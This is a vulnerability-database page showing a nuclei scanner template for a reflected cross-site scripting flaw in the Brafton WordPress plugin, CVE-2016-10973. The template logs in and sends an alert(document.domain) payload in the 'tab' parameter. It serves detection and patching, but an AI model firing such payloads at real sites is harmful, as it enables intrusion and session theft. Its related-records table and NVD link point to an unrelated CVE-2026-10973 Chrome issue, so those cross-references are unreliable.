Lucene search
K

Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting

🗓️ 25 Jun 2026 05:45:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 40 Views

Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting CVE-2016-10973. XSS vulnerability allows injection of malicious scripts, leading to data theft, session hijacking, or website defacement. Upgrade to version 3.4.9 or higher

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2026-10973
5 Jun 202613:23
circl
CNNVD
Google Chrome 安全漏洞
2 Jun 202600:00
cnnvd
CVE
CVE-2016-10973
16 Sep 201916:41
cve
CVE
CVE-2026-10973
4 Jun 202623:04
cve
Cvelist
CVE-2016-10973
16 Sep 201916:41
cvelist
Cvelist
CVE-2026-10973
4 Jun 202623:04
cvelist
Debian
[SECURITY] [DSA 6325-1] chromium security update
7 Jun 202618:43
debian
Debian CVE
CVE-2026-10973
4 Jun 202623:04
debiancve
Tenable Nessus
Debian dsa-6325 : chromium - security update
8 Jun 202600:00
nessus
Tenable Nessus
Google Chrome < 149.0.7827.53 Multiple Vulnerabilities
6 Jun 202600:00
nessus
Rows per page
id: CVE-2016-10973

info:
  name: Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd
    - https://nvd.nist.gov/vuln/detail/CVE-2026-10973
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-10973
    cwe-id: CWE-79
    epss-score: 0.0197
    epss-percentile: 0.77846
    cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: brafton
    product: brafton
    framework: wordpress
  tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "tab = alert(document.domain);")'
          - 'contains(body_2, "Brafton Article Loader")'
        condition: and
# digest: 4a0a0047304502200d5292194343b7019a614945444c48e46aab33eb8437185d63d9d86919dd570c022100a5ffdb71c461fbb718aa9e0be95f7f4eaf37af695f05aee2dc45187a6ac43284:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation